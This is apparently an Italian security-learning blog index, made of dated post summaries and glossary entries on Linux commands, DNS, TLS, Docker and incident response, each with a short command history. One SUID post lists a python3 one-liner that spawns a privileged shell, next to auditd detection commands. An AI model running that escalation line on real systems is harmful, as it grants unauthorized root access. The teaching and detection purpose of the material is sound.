I log applicativi non vedono un SYN scan - serve tcpdump a livello di rete

▶ $ history

tcpdump -i any -n 'host api.example.com'
tcpdump -i any -n 'tcp and port 443'
tcpdump 'tcp[tcpflags] & tcp-syn != 0'

Stai costruendo un'API. Il client manda una richiesta, il server risponde. Funziona. Ma cosa succede esattamente tra il momento in cui scrivi fetch("https://api.example.com/data") e quello in cui arriva la risposta?

dig - domain information groper

Mon, 30 Mar 2026 00:00:00 +0000

Invia query DNS a un nameserver e mostra la risposta completa. Strumento principale per diagnosticare DNS, verificare record, seguire la catena di risoluzione e rilevare anomalie.

TCP Handshake

Mon, 30 Mar 2026 00:00:00 +0000

Il TCP handshake e' la negoziazione obbligatoria che precede qualsiasi trasmissione dati via TCP. Tre pacchetti stabiliscono la connessione, uno la chiude. I flag nei pacchetti dicono tutto su cosa sta succedendo.

TCP vs UDP - Protocolli di Trasporto

Mon, 30 Mar 2026 00:00:00 +0000

TCP e UDP sono i due protocolli di trasporto al livello 4 dello stack OSI. TCP garantisce consegna ordinata con handshake e conferme. UDP e' senza connessione - veloce ma senza garanzie.

tcpdump - dump traffic on a network

Mon, 30 Mar 2026 00:00:00 +0000

Cattura e analizza pacchetti di rete direttamente dal terminale. Legge il traffico sull'interfaccia di rete in tempo reale o da file .dfir. Strumento fondamentale per incident response e analisi traffico.

/var/run/docker.sock - il socket di Docker

Sat, 28 Mar 2026 00:00:00 +0000

docker.sock e' il Unix domain socket che permette al Docker CLI di comunicare con dockerd. Montarlo dentro un container equivale a dare al container il controllo completo di Docker - e quindi dell'host.

Git Objects - struttura interna di git

Sat, 28 Mar 2026 00:00:00 +0000

Git memorizza tutto come oggetti immutabili nel database .git/objects. Ogni commit, system, albero e tag e' un oggetto con un hash SHA-1. Capire questa struttura e' fondamentale per il secret scanning - i segreti sopravvivono nella storia anche dopo la rimozione.

POSIX - Portable Operating System Interface

Sat, 28 Mar 2026 00:00:00 +0000

POSIX (Portable Operating System Interface) e' uno standard IEEE che definisce il comportamento di shell, comandi e chiamate di sistema su Unix-like. Garantisce portabilita' degli script tra bash, zsh, sh e dash.

Secret Scanning - trovare segreti esposti

Sat, 28 Mar 2026 00:00:00 +0000

Il secret scanning e' la pratica di cercare credenziali, chiavi API e segreti esposti per errore in repository git, file di configurazione e log. E' uno dei vettori di compromissione piu' comuni e sottovalutati.

Shebang - #!

Sat, 28 Mar 2026 00:00:00 +0000

Lo shebang (#!) e' la sequenza nei primi due byte di uno script che dice al kernel quale interprete usare. Senza shebang lo script viene eseguito dalla shell corrente - comportamento non portabile.

Shell - confronto e differenze

Sat, 28 Mar 2026 00:00:00 +0000

Le shell Unix sono interpreti di comandi che implementano POSIX come contratto minimo comune. sh e dash sono minimali e veloci, bash aggiunge estensioni comode, zsh aggiunge ancora di piu', fish rompe la compatibilita' POSIX per una sintassi piu' pulita.

SSH Protocol - Secure Shell

Sat, 28 Mar 2026 00:00:00 +0000

Protocollo per connessioni remote cifrate. Sostituisce Telnet e rlogin. Handshake, TOFU, autenticazione con chiave, challenge-response, Perfect Forward Secrecy. Confronto con TLS.

Compressione e Archivi - gzip, bzip2, zip, tar

Fri, 27 Mar 2026 00:00:00 +0000

Guida unificata a gzip, bzip2, zip e tar su Linux. Copre compressione singoli file, archiviazione multi-file, formato tar.gz, e uso forense per analisi di archivi sospetti.

ip - show / manipulate routing and interfaces

Fri, 27 Mar 2026 00:00:00 +0000

Gestisce interfacce di rete, indirizzi IP e tabella di routing. Sostituisce ifconfig (deprecato) e route. Comando fondamentale per diagnosticare e configurare la rete su Linux moderno.

locate - find files by name (database search)

Fri, 27 Mar 2026 00:00:00 +0000

Cerca file nel filesystem tramite un database pre-costruito di pathname. Molto piu' veloce di find ma non trova file creati di recente — il database viene aggiornato di notte da updatedb.

rsync - remote file synchronization

Fri, 27 Mar 2026 00:00:00 +0000

Sincronizza file e directory localmente o via rete SSH. Trasferisce solo le differenze rispetto alla destinazione — efficiente per backup incrementali e sincronizzazione remota.

ss - socket statistics

Fri, 27 Mar 2026 00:00:00 +0000

Mostra socket aperti e connessioni di rete. Sostituisce netstat (deprecato) — piu' veloce perche' legge direttamente dal kernel invece di parsare /proc. Fondamentale in incident response per vedere chi e' connesso e chi ascolta.

touch - change file timestamps

Fri, 27 Mar 2026 00:00:00 +0000

Crea file vuoti o aggiorna i timestamp di file esistenti. Il nome viene da 'touch the timestamps'. Usato spesso per creare file segnaposto negli script.

traceroute - trace route to host

Fri, 27 Mar 2026 00:00:00 +0000

Mostra il percorso che i pacchetti compiono dalla macchina locale a un host remoto, hop per hop. Sfrutta il TTL per scoprire ogni router intermedio e misurare la latenza per tratto.

wget - web get

Fri, 27 Mar 2026 00:00:00 +0000

Scarica file da URL in modo non interattivo. A differenza di curl e' ottimizzato per il download — riprende automaticamente i download interrotti e puo' scaricare siti interi ricorsivamente.

xargs - build and execute command lines from stdin

Fri, 27 Mar 2026 00:00:00 +0000

Converte stdin in argomenti per un comando. Permette di passare l'output di un comando come argomenti a un altro — fondamentale per costruire pipeline su grandi liste di file.

apropos - search man pages

Thu, 26 Mar 2026 00:00:00 +0000

Cerca una parola chiave nelle descrizioni di tutte le pagine di manuale. E' il Google interno di Linux — quando sai cosa vuoi fare ma non ricordi il nome del comando.

Bash Startup Files - file di avvio

Thu, 26 Mar 2026 00:00:00 +0000

I file di startup di bash determinano quali variabili, alias e funzioni vengono caricati all'avvio della shell. L'ordine di lettura dipende dal tipo di sessione: login shell o non-login shell.

dd - data duplicator (o disk destroyer)

Thu, 26 Mar 2026 00:00:00 +0000

Copia dati a basso livello direttamente tra dispositivi o file, blocco per blocco. Usato per clonare dischi, scrivere immagini su SD/USB, creare backup raw e acquisire immagini forensi.

lsblk - list block devices

Thu, 26 Mar 2026 00:00:00 +0000

Mostra l'albero dei dispositivi a blocchi — dischi, partizioni, LVM e relativi punti di mount. Comando moderno preferito a fdisk -l per una panoramica rapida della struttura del disco.

man - manual pages

Thu, 26 Mar 2026 00:00:00 +0000

Visualizza la documentazione ufficiale di comandi, file di configurazione, chiamate di sistema e librerie. Organizzato in 8 sezioni — sapere quale sezione cercare e' la chiave per trovare subito quello che serve.

mount / umount - mount filesystem

Thu, 26 Mar 2026 00:00:00 +0000

Aggancia un dispositivo di storage o filesystem a un punto dell'albero delle directory. Senza mount il dispositivo non e' accessibile. umount sgancia in modo sicuro prima di rimuovere fisicamente il device.

Offline. Non al buio.

Thu, 26 Mar 2026 00:00:00 +0000

TL;DR

apropos parola trova il comando quando non ne conosci il nome
comando --help ti dà i flag in cinque secondi senza uscire dal terminale
man comando è il manuale completo, navigabile con /parola per cercare
whatis comando ti dice in una riga cosa fa qualcosa che hai trovato nei log

▶ $ history

man ls
man 5 passwd
man -k password
man -f passwd
apropos permission
apropos -r "^ssh"
whatis find
tar --help
tar --help | grep extract

sha256sum - SHA-256 checksum

Thu, 26 Mar 2026 00:00:00 +0000

Calcola e verifica hash SHA-256 di file. Usato per verificare l'integrita' di download, immagini ISO, copie forensi e rilevare modifiche non autorizzate ai file.

auth.log - log di autenticazione

Wed, 25 Mar 2026 00:00:00 +0000

auth.log e' il file di log delle autenticazioni su sistemi Debian/Ubuntu. Registra login SSH, sudo, su, adduser, userdel e ogni evento PAM. E' un file di testo alterabile da root - il journal e' piu' resistente alla manomissione.

Cancellato. Ma non abbastanza.

Wed, 25 Mar 2026 00:00:00 +0000

TL;DR

testuser compare all'01:14, tenta l'escalation, poi viene cancellato alle 04:47
auth.log registra ogni evento: creazione, tre sudo falliti, disconnessione
find / -uid 1001 2>/dev/null trova i file rimasti anche dopo userdel
Cancellare un utente non cancella la sua storia - cancella solo il nome

▶ $ history

grep -E "useradd|userdel" /var/log/auth.log
grep "testuser" /var/log/auth.log
last testuser
find / -uid 1001 2>/dev/null
cat /home/testuser/.bash_history
journalctl --since "2026-03-25 04:40"

journald - systemd-journald

Wed, 25 Mar 2026 00:00:00 +0000

systemd-journald e' il demone che raccoglie e indicizza tutti i log di sistema in un database binario strutturato. A differenza di auth.log, usa FSS per rendere le modifiche rilevabili. Si legge con journalctl.

last / lastb - login history

Wed, 25 Mar 2026 00:00:00 +0000

last mostra la cronologia dei login riusciti da /var/log/wtmp. lastb mostra i login falliti da /var/log/btmp. Entrambi leggono file binari — non usare cat, usare questi comandi.

PAM - Pluggable Authentication Modules

Wed, 25 Mar 2026 00:00:00 +0000

PAM (Pluggable Authentication Modules) e' il sistema di autenticazione modulare di Linux. Ogni servizio delega l'autenticazione a PAM che esegue una catena di moduli configurabili in /etc/pam.d/.

alias - create command alias

Tue, 24 Mar 2026 00:00:00 +0000

Crea scorciatoie per comandi lunghi o complessi. Gli alias temporanei durano solo la sessione corrente, quelli permanenti vanno in ~/.bashrc o ~/.zshrc.

export - export variable to environment

Tue, 24 Mar 2026 00:00:00 +0000

Esporta variabili shell nell'ambiente, rendendole visibili ai processi figli. Fondamentale per PATH, EDITOR e variabili di configurazione che devono essere ereditate.

I file erano ancora lì. Solo che non li potevo più leggere.

Tue, 24 Mar 2026 00:00:00 +0000

TL;DR

CIA Triad: Confidentiality, Integrity, Availability - i tre pilastri che ogni attacco viola
Un ransomware li colpisce tutti e tre in sequenza: esfiltra (C), cifra (I), blocca (A)
L'ingresso era un bit SUID lasciato su python3 - zero exploit, zero CVE
Senza la CIA Triad come mappa, stai guardando i sintomi senza vedere la malattia

▶ $ history

find -perm -4000 -type f 2>/dev/null
ls -la /etc/shadow
diff /backup/etc/passwd /etc/passwd
systemctl status ssh
stat /usr/bin/python3

Sono le 23:12. Il telefono vibra tre volte di fila - notifiche di monitoring. Mi alzo, apro il portatile.

jobs / fg / bg - gestione job shell

Tue, 24 Mar 2026 00:00:00 +0000

Gestione dei job in foreground e background nella shell. jobs elenca i processi sospesi o in background, fg li riporta in primo piano, bg li riprende senza occupare il terminale.

kill - send signal to process

Tue, 24 Mar 2026 00:00:00 +0000

Invia segnali ai processi tramite PID. SIGTERM chiede una chiusura pulita, SIGKILL forza la terminazione immediata senza possibilita' di essere ignorata.

Linux Processes - processi

Tue, 24 Mar 2026 00:00:00 +0000

Un processo e' un programma in esecuzione con PID univoco, spazio di memoria isolato e stato. Il kernel crea l'illusione del multitasking switching rapidamente tra processi in coda CPU.

netplan - network-defense configuration tool

Tue, 24 Mar 2026 00:00:00 +0000

Tool di configurazione di rete su Ubuntu moderno. Legge file YAML in /etc/netplan/ e genera la configurazione per il backend di rete. Usato per assegnare IP statici alle VM di laboratorio.

printenv - print environment

Tue, 24 Mar 2026 00:00:00 +0000

Mostra le variabili d'ambiente esportate, visibili ai processi figli. A differenza di set, non mostra variabili shell locali ne' funzioni bash.

ps - process status

Tue, 24 Mar 2026 00:00:00 +0000

Mostra uno snapshot dei processi in esecuzione con PID, utente, CPU e memoria. Fondamentale in incident response per identificare processi sospetti.

scp - secure copy

Tue, 24 Mar 2026 00:00:00 +0000

Copia file tra host locale e remoto (o tra due host remoti) usando il protocollo SSH come trasporto. Stesso sistema di autenticazione e sicurezza di SSH, incluso il supporto a ~/.ssh/config.

Shell Environment - ambiente shell

Tue, 24 Mar 2026 00:00:00 +0000

L'ambiente shell e' l'insieme di variabili d'ambiente ereditate dai processi figli. Distingue variabili locali (solo shell corrente) da variabili d'ambiente (esportate, visibili ai figli).

vim - Vi IMproved

Tue, 24 Mar 2026 00:00:00 +0000

Editor di testo modale a riga di comando. Tre modalita' principali: Normal (navigazione e comandi), Insert (scrittura), Visual (selezione). Presente su tutti i sistemi Unix — sapere aprire e chiudere un file e' requisito minimo.

Anatomia di una query DNS

Mon, 23 Mar 2026 00:00:00 +0000

TL;DR

Prima di mandare qualsiasi pacchetto in rete, il sistema cerca la risposta in cache - browser, OS, /etc/hosts
Se non trova niente, chiede al resolver ISP (es. 8.8.8.8) che fa il lavoro sporco
Il resolver risale la gerarchia: Root Server → TLD Server → Nameserver autoritativo
La risposta torna con un TTL - un timer che dice quanto tenerla in cache prima di richiederla

▶ $ history

nslookup example.com
nslookup -type=MX example.com
dig example.com
dig +trace example.com
dig -x 8.8.8.8

Ogni volta che scrivi un dominio nel browser e premi invio, parte una catena di eventi che la maggior parte delle persone non vede mai. Il risultato finale è un indirizzo IP - ma il percorso per arrivarci attraversa cache locali, server distribuiti in tutto il mondo e una gerarchia precisa.

chmod +s - il bit che dimentichi e l'attaccante trova

Mon, 23 Mar 2026 00:00:00 +0000

TL;DR

SUID forza l'EUID al proprietario del file al momento dell'esecuzione - se il proprietario è root, ogni utente che lo esegue ottiene EUID=0
Un interprete con SUID root (python3, perl, bash) è escalation immediata: nessuna vulnerabilità da sfruttare, nessun exploit da compilare
find / -perm -4000 -type f 2>/dev/null in 30 secondi elenca tutto quello che conta
Detection: baseline snapshot dei SUID in CI/CD + auditd rule su execve con euid=0 e auid!=unset

▶ $ history

find -perm -4000 -type f 2>/dev/null
stat /usr/bin/python3
id
cat /proc/self/status
python3 -c "import os; os.execl('/bin/sh', 'sh', '-p')"
auditctl -l
ausearch -m execve -k suid_exec
ls -la /usr/bin/python3

Sono le 02:41. Il SIEM ha alzato un flag su prod-api-03: processo root con parent python3, nessun deploy in corso, nessuna maintenance window schedulata. Il processo è già terminato quando apro il ticket. Non c'è output, non c'è file scritto. Solo un'esecuzione anomala durata undici secondi.

Etc Directory Purpose

Mon, 23 Mar 2026 00:00:00 +0000

La directory /etc/ contiene i file di configurazione globali del sistema operativo. Include i database critici per la gestione di utenti, gruppi e privilegi.

history

Mon, 23 Mar 2026 00:00:00 +0000

Mostra la lista dei comandi eseguiti nella sessione corrente e in quelle precedenti. Permette di richiamare, cercare e riutilizzare comandi senza riscriverli.

Il file che si comporta da root - capire il bit SUID

Mon, 23 Mar 2026 00:00:00 +0000

TL;DR

I permessi Linux normali controllano chi può eseguire un file - SUID cambia con quale identità viene eseguito
Un file con SUID root gira sempre come root, indipendentemente da chi lo avvia
Esistono per necessità (es. passwd deve scrivere /etc/shadow senza darti root)
Diventano pericolosi quando vengono impostati su file sbagliati - specialmente interpreti come python3 o bash

▶ $ history

ls -la /usr/bin/passwd
stat /usr/bin/passwd
find -perm -4000 -type f 2>/dev/null
id

Quando esegui un comando su Linux, il sistema controlla chi sei - il tuo user ID - e decide cosa puoi fare. È il modello di base: ogni processo eredita i permessi dell'utente che lo ha lanciato.

su - substitute user

Mon, 23 Mar 2026 00:00:00 +0000

Esegue una shell come un altro utente. Con il flag - simula un login completo caricando l'ambiente dell'utente target. Lascia tracce diverse in auth.log rispetto a sudo.

sudo - superuser do

Mon, 23 Mar 2026 00:00:00 +0000

Esegue un singolo comando con i privilegi di un altro utente (default: root). A differenza di su, usa la password dell'utente corrente e ogni azione e' tracciata in auth.log.

User Management - gestione utenti e gruppi

Mon, 23 Mar 2026 00:00:00 +0000

Comandi per creare, modificare ed eliminare utenti e gruppi su Linux. Include adduser, usermod, userdel, groupadd, groupdel, passwd, chown, chgrp e lastlog.

CIA Triad

Sun, 22 Mar 2026 00:00:00 +0000

La triade CIA definisce i tre obiettivi fondamentali della sicurezza informatica: Confidentiality, Integrity, Availability. Ogni attacco viola almeno uno di questi tre pilastri.

Cryptography

Sun, 22 Mar 2026 00:00:00 +0000

La crittografia protegge la Confidentiality e l'Integrity dei dati. Due approcci principali: simmetrica (una chiave, veloce) e asimmetrica (coppia pubblica/privata, lenta). I sistemi reali usano entrambe insieme.

curl - Client URL

Sun, 22 Mar 2026 00:00:00 +0000

Client HTTP da riga di comando. Manda richieste HTTP/HTTPS e mostra la risposta. Piu' versatile di wget per testare API, vedere header e debuggare servizi web.

Il lucchetto verde - cosa succede davvero in quei 250 millisecondi

Sun, 22 Mar 2026 00:00:00 +0000

TL;DR

Prima del TLS c'è TCP: tre pacchetti solo per aprire il canale
ClientHello è il nome reale del messaggio - lo vedi in Wireshark, è nell'RFC
Browser e server derivano la stessa chiave senza mai trasmettersela (Diffie-Hellman)
Ogni sessione usa chiavi nuove e le butta via - anche se qualcuno ruba la chiave del server tra un anno, il traffico di oggi resta illeggibile

▶ $ history

openssl s_client -connect google.com:443 -showcerts
openssl s_client -connect dominio.com:443 2>/dev/null | openssl x509 -noout -dates
openssl s_client -connect google.com:443 </dev/null 2>/dev/null | openssl x509 -noout -text | grep -E "Subject|Issuer|Not After"

Ogni volta che scrivi https:// nel browser e premi invio, sullo sfondo succede qualcosa che la maggior parte degli sviluppatori web dà per scontato. Il lucchetto verde appare, la connessione è "sicura", si va avanti.

Sun, 22 Mar 2026 00:00:00 +0000

Pager — mostra un file una schermata alla volta. Se il contenuto entra in una schermata esce subito. Se non entra va in modalità interattiva. Usato come vettore di escape in Bandit 25.

Command Grouping - {}

Sat, 21 Mar 2026 00:00:00 +0000

Le graffe {} raggruppano piu' comandi in un unico stdout. La pipe che segue riceve tutto l'output come se fosse un comando solo. Fondamentale per mandare stream di dati a un processo senza aprire connessioni multiple.

chmod - change mode

Thu, 19 Mar 2026 00:00:00 +0000

Modifica i permessi di accesso di file e directory. Supporta notazione ottale (stato finale esatto) e simbolica (modifica singolo bit). Fondamentale per il principio del minimo privilegio.

docker

Thu, 19 Mar 2026 00:00:00 +0000

Piattaforma di containerizzazione per eseguire applicazioni in ambienti isolati. Ogni container e' un processo con il proprio filesystem, rete e permessi, isolato dagli altri.

Docker - Modello Mentale

Thu, 19 Mar 2026 00:00:00 +0000

Modello mentale per capire Docker prima di entrare nei dettagli tecnici. Ogni container e' un mini Linux isolato - un appartamento in un condominio.

Docker Compose

Thu, 19 Mar 2026 00:00:00 +0000

File YAML che descrive un'applicazione multi-container: quali immagini usare, come configurarle, come collegarle in rete, dove salvare i dati. Un solo file per gestire tutta l'infrastruttura.

Docker Image

Thu, 19 Mar 2026 00:00:00 +0000

Un'immagine Docker e' il template immutabile da cui nascono i container. Contiene il filesystem, le dipendenze e le istruzioni di avvio. Il container e' l'immagine in esecuzione.

Docker Security

Thu, 19 Mar 2026 00:00:00 +0000

I rischi di sicurezza specifici di Docker: docker.sock come vettore di privilege escalation, container root, porte esposte, immagini vulnerabili. Come difendersi da ciascuno.

Dockerfile

Thu, 19 Mar 2026 00:00:00 +0000

File di istruzioni per costruire un'immagine Docker. Ogni istruzione aggiunge un layer. ENTRYPOINT e CMD definiscono cosa esegue il container quando parte.

Reverse Proxy

Thu, 19 Mar 2026 00:00:00 +0000

Server intermediario che si posiziona davanti all'infrastruttura interna, accettando tutte le richieste esterne e distribuendole ai server giusti. Protegge il server, non il client.

tmux

Thu, 19 Mar 2026 00:00:00 +0000

Terminal multiplexer — permette di avere piu finestre e pannelli in un solo terminale, e di lasciare sessioni attive in background anche dopo aver chiuso la connessione SSH.

traefik

Thu, 19 Mar 2026 00:00:00 +0000

Edge router e reverse proxy moderno che si configura automaticamente leggendo i metadati dei container Docker. Zero configurazione manuale per ogni nuovo servizio.

Chi Sei per il Kernel

Wed, 18 Mar 2026 00:00:00 +0000

TL;DR

Linux non lavora con nomi utente - lavora con numeri: UID e GID
Ogni file ha tre livelli di permessi: owner, group, others
Il bit SUID cambia le regole: il processo gira con i privilegi del proprietario del file, non di chi lo esegue
find / -perm -4000 trova tutti i binari SUID del sistema - un'occhiata vale sempre

▶ $ history

id
ls -la /usr/bin/passwd
find / -perm -4000 -type f 2>/dev/null
chmod u+s /path/to/file
chmod u-s /path/to/file
find / -perm -4000 -type f 2>/dev/null | grep -v -E "^/(usr/bin|usr/sbin|bin|sbin|usr/lib)"

Linux non sa chi sei. Sa solo il tuo numero.

Shell Interattiva vs Non Interattiva

Wed, 18 Mar 2026 00:00:00 +0000

La differenza tra shell interattiva e non interattiva determina quali file di configurazione vengono letti all'avvio. Fondamentale per capire persistence via dotfile e comportamento di SSH.

SUID, SGID e Sticky Bit

Wed, 18 Mar 2026 00:00:00 +0000

I tre bit speciali dei permessi Linux: SUID fa girare un processo con i permessi del proprietario del file, SGID con quelli del gruppo, Sticky Bit impedisce la cancellazione da parte di chi non è proprietario.

Find

Tue, 17 Mar 2026 00:00:00 +0000

Cerca file e directory nel filesystem in base a criteri specifici (nome, dimensione, permessi, utente). È uno strumento ricorsivo per natura, fondamentale per l'analisi del sistema e la ricerca di artefatti.

git - sistema di controllo versione distribuito

Tue, 17 Mar 2026 00:00:00 +0000

Sistema di version control distribuito. Traccia modifiche ai file nel tempo, permette collaborazione, branching e rollback. Ogni sviluppatore ha una copia completa del repository, inclusa tutta la storia.

HTTP in Detail

Tue, 17 Mar 2026 00:00:00 +0000

Protocollo HTTP: struttura URL, metodi, status code, header, cookie e sessioni. Prospettiva applicativa.

apt - gestione pacchetti Debian/Ubuntu